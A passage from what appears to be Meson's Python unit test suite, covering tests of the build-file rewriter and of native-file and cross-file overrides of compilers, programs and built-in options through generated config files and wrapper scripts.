'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp']}, 'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileC.cpp']}, 'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp']}, 'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp']}, 'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileC.cpp']}, 'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp']}, 'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileC.cpp', 'main.cpp']}, 'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp']}, 'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp']}, } } self.assertDictEqual(out, expected) # Check the written file out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) self.assertDictEqual(out, expected) def test_target_subdir(self): self.prime('2 subdirs') out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json')) expected = {'name': 'something', 'sources': ['first.c', 'second.c', 'third.c']} self.assertDictEqual(list(out['target'].values())[0], expected) # Check the written file out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) self.assertDictEqual(list(out['target'].values())[0], expected) def test_target_remove(self): self.prime('1 basic') self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = { 'target': { 'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']}, 'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']}, 'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 
'fileA.cpp']}, 'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']}, } } self.assertDictEqual(out, expected) def test_tatrget_add(self): self.prime('1 basic') self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = { 'target': { 'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']}, 'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']}, 'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']}, 'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']}, 'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog10@sha': {'name': 'trivialprog10', 'sources': ['new1.cpp', 'new2.cpp']}, } } self.assertDictEqual(out, expected) def test_target_remove_subdir(self): self.prime('2 subdirs') self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) self.assertDictEqual(out, {}) def test_target_add_subdir(self): self.prime('2 subdirs') self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = {'name': 'something', 'sources': ['first.c', 'second.c']} self.assertDictEqual(out['target']['94b671c@@something@exe'], expected) def test_target_source_sorting(self): self.prime('5 sorting') add_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'src_add', 'sources': ['a666.c']}]) inf_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'info'}]) out = self.rewrite(self.builddir, add_json) out = self.rewrite(self.builddir, inf_json) expected = { 'target': { 'exe1@exe': { 'name': 'exe1', 'sources': [ 'aaa/a/a1.c', 'aaa/b/b1.c', 'aaa/b/b2.c', 'aaa/f1.c', 'aaa/f2.c', 'aaa/f3.c', 'bbb/a/b1.c', 'bbb/b/b2.c', 'bbb/c1/b5.c', 'bbb/c2/b7.c', 'bbb/c10/b6.c', 'bbb/a4.c', 'bbb/b3.c', 'bbb/b4.c', 'bbb/b5.c', 'a1.c', 'a2.c', 'a3.c', 'a10.c', 'a20.c', 'a30.c', 'a100.c', 'a101.c', 'a110.c', 'a210.c', 'a666.c', 'b1.c', 'c2.c' ] } } } self.assertDictEqual(out, expected) def test_target_same_name_skip(self): self.prime('4 same name targets') out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = {'name': 'myExe', 'sources': ['main.cpp']} self.assertEqual(len(out['target']), 2) for val in out['target'].values(): self.assertDictEqual(expected, val) def test_kwargs_info(self): self.prime('3 kwargs') out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = { 'kwargs': { 'project#/': {'version': '0.0.1'}, 'target#tgt1': {'build_by_default': True}, 'dependency#dep1': {'required': False} } } self.assertDictEqual(out, expected) def test_kwargs_set(self): self.prime('3 kwargs') self.rewrite(self.builddir, os.path.join(self.builddir, 
'set.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = { 'kwargs': { 'project#/': {'version': '0.0.2', 'meson_version': '0.50.0', 'license': ['GPL', 'MIT']}, 'target#tgt1': {'build_by_default': False, 'build_rpath': '/usr/local', 'dependencies': 'dep1'}, 'dependency#dep1': {'required': True, 'method': 'cmake'} } } self.assertDictEqual(out, expected) def test_kwargs_add(self): self.prime('3 kwargs') self.rewrite(self.builddir, os.path.join(self.builddir, 'add.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = { 'kwargs': { 'project#/': {'version': '0.0.1', 'license': ['GPL', 'MIT', 'BSD']}, 'target#tgt1': {'build_by_default': True}, 'dependency#dep1': {'required': False} } } self.assertDictEqual(out, expected) def test_kwargs_remove(self): self.prime('3 kwargs') self.rewrite(self.builddir, os.path.join(self.builddir, 'remove.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = { 'kwargs': { 'project#/': {'version': '0.0.1', 'license': 'GPL'}, 'target#tgt1': {'build_by_default': True}, 'dependency#dep1': {'required': False} } } self.assertDictEqual(out, expected) def test_kwargs_remove_regex(self): self.prime('3 kwargs') self.rewrite(self.builddir, os.path.join(self.builddir, 'remove_regex.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = { 'kwargs': { 'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=true']}, 'target#tgt1': {'build_by_default': True}, 'dependency#dep1': {'required': False} } } self.assertDictEqual(out, expected) def test_kwargs_delete(self): self.prime('3 kwargs') self.rewrite(self.builddir, os.path.join(self.builddir, 'delete.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = { 'kwargs': { 'project#/': {}, 'target#tgt1': {}, 'dependency#dep1': {'required': False} } } self.assertDictEqual(out, expected) def test_default_options_set(self): self.prime('3 kwargs') self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_set.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = { 'kwargs': { 'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=True', 'cpp_std=c++11']}, 'target#tgt1': {'build_by_default': True}, 'dependency#dep1': {'required': False} } } self.assertDictEqual(out, expected) def test_default_options_delete(self): self.prime('3 kwargs') self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_delete.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = { 'kwargs': { 'project#/': {'version': '0.0.1', 'default_options': ['cpp_std=c++14', 'debug=true']}, 'target#tgt1': {'build_by_default': True}, 'dependency#dep1': {'required': False} } } self.assertDictEqual(out, expected) class NativeFileTests(BasePlatformTests): def setUp(self): super().setUp() self.testcase = os.path.join(self.unit_test_dir, '47 native file binary') self.current_config = 0 self.current_wrapper = 0 def helper_create_native_file(self, values): """Create a config file as a temporary file. 
values should be a nested dictionary structure of {section: {key: value}} """ filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config)) self.current_config += 1 with open(filename, 'wt') as f: for section, entries in values.items(): f.write('[{}]\n'.format(section)) for k, v in entries.items(): if isinstance(v, (bool, int, float)): f.write("{}={}\n".format(k, v)) elif isinstance(v, list): f.write("{}=[{}]\n".format(k, ', '.join(["'{}'".format(w) for w in v]))) else: f.write("{}='{}'\n".format(k, v)) return filename def helper_create_binary_wrapper(self, binary, dir_=None, extra_args=None, **kwargs): """Creates a wrapper around a binary that overrides specific values.""" filename = os.path.join(dir_ or self.builddir, 'binary_wrapper{}.py'.format(self.current_wrapper)) extra_args = extra_args or {} self.current_wrapper += 1 if is_haiku(): chbang = '#!/bin/env python3' else: chbang = '#!/usr/bin/env python3' with open(filename, 'wt') as f: f.write(textwrap.dedent('''\ {} import argparse import subprocess import sys def main(): parser = argparse.ArgumentParser() '''.format(chbang))) for name in chain(extra_args, kwargs): f.write(' parser.add_argument("-{0}", "--{0}", action="store_true")\n'.format(name)) f.write(' args, extra_args = parser.parse_known_args()\n') for name, value in chain(extra_args.items(), kwargs.items()): f.write(' if args.{}:\n'.format(name)) f.write(' print("{}", file=sys.{})\n'.format(value, kwargs.get('outfile', 'stdout'))) f.write(' sys.exit(0)\n') f.write(textwrap.dedent(''' ret = subprocess.run( ["{}"] + extra_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(ret.stdout.decode('utf-8')) print(ret.stderr.decode('utf-8'), file=sys.stderr) sys.exit(ret.returncode) if __name__ == '__main__': main() '''.format(binary))) if not is_windows(): os.chmod(filename, 0o755) return filename # On windows we need yet another level of indirection, as cmd cannot # invoke python files itself, so instead we generate a .bat file, which # invokes our python wrapper batfile = os.path.join(self.builddir, 'binary_wrapper{}.bat'.format(self.current_wrapper)) with open(batfile, 'wt') as f: f.write(r'@{} {} %*'.format(sys.executable, filename)) return batfile def helper_for_compiler(self, lang, cb, for_machine = MachineChoice.HOST): """Helper for generating tests for overriding compilers for langaugages with more than one implementation, such as C, C++, ObjC, ObjC++, and D. """ env = get_fake_env() getter = getattr(env, 'detect_{}_compiler'.format(lang)) getter = functools.partial(getter, for_machine) cc = getter() binary, newid = cb(cc) env.binaries[for_machine].binaries[lang] = binary compiler = getter() self.assertEqual(compiler.id, newid) def test_multiple_native_files_override(self): wrapper = self.helper_create_binary_wrapper('bash', version='foo') config = self.helper_create_native_file({'binaries': {'bash': wrapper}}) wrapper = self.helper_create_binary_wrapper('bash', version='12345') config2 = self.helper_create_native_file({'binaries': {'bash': wrapper}}) self.init(self.testcase, extra_args=[ '--native-file', config, '--native-file', config2, '-Dcase=find_program']) # This test hangs on cygwin. 
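# and fifos are unavailable outside POSIX, so the test is skipped there.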
@unittest.skipIf(os.name != 'posix' or is_cygwin(), 'Uses fifos, which are not available on non Unix OSes.') def test_native_file_is_pipe(self): fifo = os.path.join(self.builddir, 'native.file') os.mkfifo(fifo) with tempfile.TemporaryDirectory() as d: wrapper = self.helper_create_binary_wrapper('bash', d, version='12345') def filler(): with open(fifo, 'w') as f: f.write('[binaries]\n') f.write("bash = '{}'\n".format(wrapper)) thread = threading.Thread(target=filler) thread.start() self.init(self.testcase, extra_args=['--native-file', fifo, '-Dcase=find_program']) thread.join() os.unlink(fifo) self.init(self.testcase, extra_args=['--wipe']) def test_multiple_native_files(self): wrapper = self.helper_create_binary_wrapper('bash', version='12345') config = self.helper_create_native_file({'binaries': {'bash': wrapper}}) wrapper = self.helper_create_binary_wrapper('python') config2 = self.helper_create_native_file({'binaries': {'python': wrapper}}) self.init(self.testcase, extra_args=[ '--native-file', config, '--native-file', config2, '-Dcase=find_program']) def _simple_test(self, case, binary, entry=None): wrapper = self.helper_create_binary_wrapper(binary, version='12345') config = self.helper_create_native_file({'binaries': {entry or binary: wrapper}}) self.init(self.testcase, extra_args=['--native-file', config, '-Dcase={}'.format(case)]) def test_find_program(self): self._simple_test('find_program', 'bash') def test_config_tool_dep(self): # Do the skip at this level to avoid screwing up the cache if mesonbuild.environment.detect_msys2_arch(): raise unittest.SkipTest('Skipped due to problems with LLVM on MSYS2') if not shutil.which('llvm-config'): raise unittest.SkipTest('No llvm-installed, cannot test') self._simple_test('config_dep', 'llvm-config') def test_python3_module(self): self._simple_test('python3', 'python3') def test_python_module(self): if is_windows(): # Bat adds extra crap to stdout, so the version check logic in the # python module breaks. This is fine on other OSes because they # don't need the extra indirection. 
raise unittest.SkipTest('bat indirection breaks internal sanity checks.') elif is_osx(): binary = 'python' else: binary = 'python2' # We not have python2, check for it for v in ['2', '2.7', '-2.7']: rc = subprocess.call(['pkg-config', '--cflags', 'python{}'.format(v)], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) if rc == 0: break else: raise unittest.SkipTest('Not running Python 2 tests because dev packages not installed.') self._simple_test('python', binary, entry='python') @unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard') @skip_if_env_set('CC') def test_c_compiler(self): def cb(comp): if comp.id == 'gcc': if not shutil.which('clang'): raise unittest.SkipTest('Only one compiler found, cannot test.') return 'clang', 'clang' if not is_real_gnu_compiler(shutil.which('gcc')): raise unittest.SkipTest('Only one compiler found, cannot test.') return 'gcc', 'gcc' self.helper_for_compiler('c', cb) @unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard') @skip_if_env_set('CXX') def test_cpp_compiler(self): def cb(comp): if comp.id == 'gcc': if not shutil.which('clang++'): raise unittest.SkipTest('Only one compiler found, cannot test.') return 'clang++', 'clang' if not is_real_gnu_compiler(shutil.which('g++')): raise unittest.SkipTest('Only one compiler found, cannot test.') return 'g++', 'gcc' self.helper_for_compiler('cpp', cb) @skip_if_not_language('objc') @skip_if_env_set('OBJC') def test_objc_compiler(self): def cb(comp): if comp.id == 'gcc': if not shutil.which('clang'): raise unittest.SkipTest('Only one compiler found, cannot test.') return 'clang', 'clang' if not is_real_gnu_compiler(shutil.which('gcc')): raise unittest.SkipTest('Only one compiler found, cannot test.') return 'gcc', 'gcc' self.helper_for_compiler('objc', cb) @skip_if_not_language('objcpp') @skip_if_env_set('OBJCXX') def test_objcpp_compiler(self): def cb(comp): if comp.id == 'gcc': if not shutil.which('clang++'): raise unittest.SkipTest('Only one compiler found, cannot test.') return 'clang++', 'clang' if not is_real_gnu_compiler(shutil.which('g++')): raise unittest.SkipTest('Only one compiler found, cannot test.') return 'g++', 'gcc' self.helper_for_compiler('objcpp', cb) @skip_if_not_language('d') @skip_if_env_set('DC') def test_d_compiler(self): def cb(comp): if comp.id == 'dmd': if shutil.which('ldc'): return 'ldc', 'ldc' elif shutil.which('gdc'): return 'gdc', 'gdc' else: raise unittest.SkipTest('No alternative dlang compiler found.') if shutil.which('dmd'): return 'dmd', 'dmd' raise unittest.SkipTest('No alternative dlang compiler found.') self.helper_for_compiler('d', cb) @skip_if_not_language('cs') @skip_if_env_set('CSC') def test_cs_compiler(self): def cb(comp): if comp.id == 'csc': if not shutil.which('mcs'): raise unittest.SkipTest('No alternate C# implementation.') return 'mcs', 'mcs' if not shutil.which('csc'): raise unittest.SkipTest('No alternate C# implementation.') return 'csc', 'csc' self.helper_for_compiler('cs', cb) @skip_if_not_language('fortran') @skip_if_env_set('FC') def test_fortran_compiler(self): def cb(comp): if comp.id == 'lcc': if shutil.which('lfortran'): return 'lfortran', 'lcc' raise unittest.SkipTest('No alternate Fortran implementation.') elif comp.id == 'gcc': if shutil.which('ifort'): # There is an ICC for windows (windows build, linux host), # but we don't support that ATM so lets not worry about it. 
if is_windows(): return 'ifort', 'intel-cl' return 'ifort', 'intel' elif shutil.which('flang'): return 'flang', 'flang' elif shutil.which('pgfortran'): return 'pgfortran', 'pgi' # XXX: there are several other fortran compilers meson # supports, but I don't have any of them to test with raise unittest.SkipTest('No alternate Fortran implementation.') if not shutil.which('gfortran'): raise unittest.SkipTest('No alternate Fortran implementation.') return 'gfortran', 'gcc' self.helper_for_compiler('fortran', cb) def _single_implementation_compiler(self, lang, binary, version_str, version): """Helper for languages with a single (supported) implementation. Builds a wrapper around the compiler to override the version. """ wrapper = self.helper_create_binary_wrapper(binary, version=version_str) env = get_fake_env() getter = getattr(env, 'detect_{}_compiler'.format(lang)) getter = functools.partial(getter, MachineChoice.HOST) env.binaries.host.binaries[lang] = wrapper compiler = getter() self.assertEqual(compiler.version, version) @skip_if_not_language('vala') @skip_if_env_set('VALAC') def test_vala_compiler(self): self._single_implementation_compiler( 'vala', 'valac', 'Vala 1.2345', '1.2345') @skip_if_not_language('rust') @skip_if_env_set('RUSTC') def test_rust_compiler(self): self._single_implementation_compiler( 'rust', 'rustc', 'rustc 1.2345', '1.2345') @skip_if_not_language('java') def test_java_compiler(self): self._single_implementation_compiler( 'java', 'javac', 'javac 9.99.77', '9.99.77') @skip_if_not_language('swift') def test_swift_compiler(self): wrapper = self.helper_create_binary_wrapper( 'swiftc', version='Swift 1.2345', outfile='stderr', extra_args={'Xlinker': 'macosx_version. PROJECT:ld - 1.2.3'}) env = get_fake_env() env.binaries.host.binaries['swift'] = wrapper compiler = env.detect_swift_compiler(MachineChoice.HOST) self.assertEqual(compiler.version, '1.2345') def test_native_file_dirs(self): testcase = os.path.join(self.unit_test_dir, '60 native file override') self.init(testcase, default_args=False, extra_args=['--native-file', os.path.join(testcase, 'nativefile')]) def test_native_file_dirs_overriden(self): testcase = os.path.join(self.unit_test_dir, '60 native file override') self.init(testcase, default_args=False, extra_args=['--native-file', os.path.join(testcase, 'nativefile'), '-Ddef_libdir=liblib', '-Dlibdir=liblib']) def test_compile_sys_path(self): """Compiling with a native file stored in a system path works. There was a bug which caused the paths to be stored incorrectly and would result in ninja invoking meson in an infinite loop. This tests for that by actually invoking ninja. 
""" testcase = os.path.join(self.common_test_dir, '1 trivial') # It really doesn't matter what's in the native file, just that it exists config = self.helper_create_native_file({'binaries': {'bash': 'false'}}) self.init(testcase, extra_args=['--native-file', config]) self.build() def test_user_options(self): testcase = os.path.join(self.common_test_dir, '41 options') for opt, value in [('testoption', 'some other val'), ('other_one', True), ('combo_opt', 'one'), ('array_opt', ['two']), ('integer_opt', 0), ('CaseSenSiTivE', 'SOME other Value'), ('CASESENSITIVE', 'some other Value')]: config = self.helper_create_native_file({'project options': {opt: value}}) with self.assertRaises(subprocess.CalledProcessError) as cm: self.init(testcase, extra_args=['--native-file', config]) self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option') def test_user_options_command_line_overrides(self): testcase = os.path.join(self.common_test_dir, '41 options') config = self.helper_create_native_file({'project options': {'other_one': True}}) self.init(testcase, extra_args=['--native-file', config, '-Dother_one=false']) def test_user_options_subproject(self): testcase = os.path.join(self.unit_test_dir, '80 user options for subproject') s = os.path.join(testcase, 'subprojects') if not os.path.exists(s): os.mkdir(s) s = os.path.join(s, 'sub') if not os.path.exists(s): sub = os.path.join(self.common_test_dir, '41 options') shutil.copytree(sub, s) for opt, value in [('testoption', 'some other val'), ('other_one', True), ('combo_opt', 'one'), ('array_opt', ['two']), ('integer_opt', 0)]: config = self.helper_create_native_file({'sub:project options': {opt: value}}) with self.assertRaises(subprocess.CalledProcessError) as cm: self.init(testcase, extra_args=['--native-file', config]) self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option') def test_option_bool(self): # Bools are allowed to be unquoted testcase = os.path.join(self.common_test_dir, '1 trivial') config = self.helper_create_native_file({'built-in options': {'werror': True}}) self.init(testcase, extra_args=['--native-file', config]) configuration = self.introspect('--buildoptions') for each in configuration: # Test that no-per subproject options are inherited from the parent if 'werror' in each['name']: self.assertEqual(each['value'], True) break else: self.fail('Did not find werror in build options?') def test_option_integer(self): # Bools are allowed to be unquoted testcase = os.path.join(self.common_test_dir, '1 trivial') config = self.helper_create_native_file({'built-in options': {'unity_size': 100}}) self.init(testcase, extra_args=['--native-file', config]) configuration = self.introspect('--buildoptions') for each in configuration: # Test that no-per subproject options are inherited from the parent if 'unity_size' in each['name']: self.assertEqual(each['value'], 100) break else: self.fail('Did not find unity_size in build options?') def test_builtin_options(self): testcase = os.path.join(self.common_test_dir, '2 cpp') config = self.helper_create_native_file({'built-in options': {'cpp_std': 'c++14'}}) self.init(testcase, extra_args=['--native-file', config]) configuration = self.introspect('--buildoptions') for each in configuration: if each['name'] == 'cpp_std': self.assertEqual(each['value'], 'c++14') break else: self.fail('Did not find werror in build options?') def test_builtin_options_conf_overrides_env(self): testcase = os.path.join(self.common_test_dir, '2 cpp') config = self.helper_create_native_file({'built-in 
options': {'pkg_config_path': '/foo'}}) self.init(testcase, extra_args=['--native-file', config], override_envvars={'PKG_CONFIG_PATH': '/bar'}) configuration = self.introspect('--buildoptions') for each in configuration: if each['name'] == 'pkg_config_path': self.assertEqual(each['value'], ['/foo']) break else: self.fail('Did not find pkg_config_path in build options?') def test_builtin_options_subprojects(self): testcase = os.path.join(self.common_test_dir, '99 subproject subdir') config = self.helper_create_native_file({'built-in options': {'default_library': 'both', 'c_args': ['-Dfoo']}, 'sub:built-in options': {'default_library': 'static'}}) self.init(testcase, extra_args=['--native-file', config]) configuration = self.introspect('--buildoptions') found = 0 for each in configuration: # Test that non-per-subproject options are inherited from the parent if 'c_args' in each['name']: # This path will be hit twice, once for build and once for host, self.assertEqual(each['value'], ['-Dfoo']) found += 1 elif each['name'] == 'default_library': self.assertEqual(each['value'], 'both') found += 1 elif each['name'] == 'sub:default_library': self.assertEqual(each['value'], 'static') found += 1 self.assertEqual(found, 4, 'Did not find all four expected option values') def test_builtin_options_subprojects_overrides_buildfiles(self): # If the buildfile says subproject(... default_library: shared), ensure that's overwritten testcase = os.path.join(self.common_test_dir, '224 persubproject options') config = self.helper_create_native_file({'sub2:built-in options': {'default_library': 'shared'}}) with self.assertRaises(subprocess.CalledProcessError) as cm: self.init(testcase, extra_args=['--native-file', config]) self.assertIn('Parent should override default_library', cm.exception.stdout) def test_builtin_options_subprojects_dont_inherits_parent_override(self): # If the buildfile says subproject(... 
default_library: shared), ensure that's overwritten testcase = os.path.join(self.common_test_dir, '224 persubproject options') config = self.helper_create_native_file({'built-in options': {'default_library': 'both'}}) self.init(testcase, extra_args=['--native-file', config]) def test_builtin_options_compiler_properties(self): # the properties section can have lang_args, and those need to be # overwritten by the built-in options testcase = os.path.join(self.common_test_dir, '1 trivial') config = self.helper_create_native_file({ 'built-in options': {'c_args': ['-DFOO']}, 'properties': {'c_args': ['-DBAR']}, }) self.init(testcase, extra_args=['--native-file', config]) configuration = self.introspect('--buildoptions') for each in configuration: if each['name'] == 'c_args': self.assertEqual(each['value'], ['-DFOO']) break else: self.fail('Did not find c_args in build options?') def test_builtin_options_compiler_properties_legacy(self): # The legacy placement in properties is still valid if a 'built-in # options' setting is present, but doesn't have the lang_args testcase = os.path.join(self.common_test_dir, '1 trivial') config = self.helper_create_native_file({ 'built-in options': {'default_library': 'static'}, 'properties': {'c_args': ['-DBAR']}, }) self.init(testcase, extra_args=['--native-file', config]) configuration = self.introspect('--buildoptions') for each in configuration: if each['name'] == 'c_args': self.assertEqual(each['value'], ['-DBAR']) break else: self.fail('Did not find c_args in build options?') def test_builtin_options_paths(self): # the paths section can also set directory options, and those need to be # overwritten by the built-in options testcase = os.path.join(self.common_test_dir, '1 trivial') config = self.helper_create_native_file({ 'built-in options': {'bindir': 'foo'}, 'paths': {'bindir': 'bar'}, }) self.init(testcase, extra_args=['--native-file', config]) configuration = self.introspect('--buildoptions') for each in configuration: if each['name'] == 'bindir': self.assertEqual(each['value'], 'foo') break else: self.fail('Did not find bindir in build options?') def test_builtin_options_paths_legacy(self): testcase = os.path.join(self.common_test_dir, '1 trivial') config = self.helper_create_native_file({ 'built-in options': {'default_library': 'static'}, 'paths': {'bindir': 'bar'}, }) self.init(testcase, extra_args=['--native-file', config]) configuration = self.introspect('--buildoptions') for each in configuration: if each['name'] == 'bindir': self.assertEqual(each['value'], 'bar') break else: self.fail('Did not find bindir in build options?') class CrossFileTests(BasePlatformTests): """Tests for cross file functionality not directly related to cross compiling. This is mainly aimed at testing overrides from cross files. 
""" def setUp(self): super().setUp() self.current_config = 0 self.current_wrapper = 0 def _cross_file_generator(self, *, needs_exe_wrapper: bool = False, exe_wrapper: T.Optional[T.List[str]] = None) -> str: if is_windows(): raise unittest.SkipTest('Cannot run this test on non-mingw/non-cygwin windows') return textwrap.dedent(f"""\ [binaries] c = '{shutil.which('gcc' if is_sunos() else 'cc')}' ar = '{shutil.which('ar')}' strip = '{shutil.which('strip')}' exe_wrapper = {str(exe_wrapper) if exe_wrapper is not None else '[]'} [properties] needs_exe_wrapper = {needs_exe_wrapper} [host_machine] system = 'linux' cpu_family = 'x86' cpu = 'i686' endian = 'little' """) def _stub_exe_wrapper(self) -> str: return textwrap.dedent('''\ #!/usr/bin/env python3 import subprocess import sys sys.exit(subprocess.run(sys.argv[1:]).returncode) ''') def test_needs_exe_wrapper_true(self): testdir = os.path.join(self.unit_test_dir, '72 cross test passed') with tempfile.TemporaryDirectory() as d: p = Path(d) / 'crossfile' with p.open('wt') as f: f.write(self._cross_file_generator(needs_exe_wrapper=True)) self.init(testdir, extra_args=['--cross-file=' + str(p)]) out = self.run_target('test') self.assertRegex(out, r'Skipped:\s*1\s*\n') def test_needs_exe_wrapper_false(self): testdir = os.path.join(self.unit_test_dir, '72 cross test passed') with tempfile.TemporaryDirectory() as d: p = Path(d) / 'crossfile' with p.open('wt') as f: f.write(self._cross_file_generator(needs_exe_wrapper=False)) self.init(testdir, extra_args=['--cross-file=' + str(p)]) out = self.run_target('test') self.assertNotRegex(out, r'Skipped:\s*1\n') def test_needs_exe_wrapper_true_wrapper(self): testdir = os.path.join(self.unit_test_dir, '72 cross test passed') with tempfile.TemporaryDirectory() as d: s = Path(d) / 'wrapper.py' with s.open('wt') as f: f.write(self._stub_exe_wrapper()) s.chmod(0o774) p = Path(d) / 'crossfile' with p.open('wt') as f: f.write(self._cross_file_generator( needs_exe_wrapper=True, exe_wrapper=[str(s)])) self.init(testdir, extra_args=['--cross-file=' + str(p), '-Dexpect=true']) out = self.run_target('test') self.assertRegex(out, r'Ok:\s*3\s*\n') def test_cross_exe_passed_no_wrapper(self): testdir = os.path.join(self.unit_test_dir, '72 cross test passed') with tempfile.TemporaryDirectory() as d: p = Path(d) / 'crossfile' with p.open('wt') as f: f.write(self._cross_file_generator(needs_exe_wrapper=True)) self.init(testdir, extra_args=['--cross-file=' + str(p)]) self.build() out = self.run_target('test') self.assertRegex(out, r'Skipped:\s*1\s*\n') # The test uses mocking and thus requires that the current process is the # one to run the Meson steps. If we are using an external test executable # (most commonly in Debian autopkgtests) then the mocking won't work. 
@unittest.skipIf('MESON_EXE' in os.environ, 'MESON_EXE is defined, can not use mocking.') def test_cross_file_system_paths(self): if is_windows(): raise unittest.SkipTest('system crossfile paths not defined for Windows (yet)') testdir = os.path.join(self.common_test_dir, '1 trivial') cross_content = self._cross_file_generator() with tempfile.TemporaryDirectory() as d: dir_ = os.path.join(d, 'meson', 'cross') os.makedirs(dir_) with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f: f.write(cross_content) name = os.path.basename(f.name) with mock.patch.dict(os.environ, {'XDG_DATA_HOME': d}): self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True) self.wipe() with mock.patch.dict(os.environ, {'XDG_DATA_DIRS': d}): os.environ.pop('XDG_DATA_HOME', None) self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True) self.wipe() with tempfile.TemporaryDirectory() as d: dir_ = os.path.join(d, '.local', 'share', 'meson', 'cross') os.makedirs(dir_) with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f: f.write(cross_content) name = os.path.basename(f.name) # If XDG_DATA_HOME is set in the environment running the # tests this test will fail, os mock the environment, pop # it, then test with mock.patch.dict(os.environ): os.environ.pop('XDG_DATA_HOME', None) with mock.patch('mesonbuild.coredata.os.path.expanduser', lambda x: x.replace('~', d)): self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True) self.wipe() def helper_create_cross_file(self, values): """Create a config file as a temporary file. values should be a nested dictionary structure of {section: {key: value}} """ filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config)) self.current_config += 1 with open(filename, 'wt') as f: for section, entries in values.items(): f.write('[{}]\n'.format(section)) for k, v in entries.items(): f.write("{}='{}'\n".format(k, v)) return filename def test_cross_file_dirs(self): testcase = os.path.join(self.unit_test_dir, '60 native file override') self.init(testcase, default_args=False, extra_args=['--native-file', os.path.join(testcase, 'nativefile'), '--cross-file', os.path.join(testcase, 'crossfile'), '-Ddef_bindir=binbar', '-Ddef_datadir=databar', '-Ddef_includedir=includebar', '-Ddef_infodir=infobar', '-Ddef_libdir=libbar', '-Ddef_libexecdir=libexecbar', '-Ddef_localedir=localebar', '-Ddef_localstatedir=localstatebar', '-Ddef_mandir=manbar', '-Ddef_sbindir=sbinbar', '-Ddef_sharedstatedir=sharedstatebar', 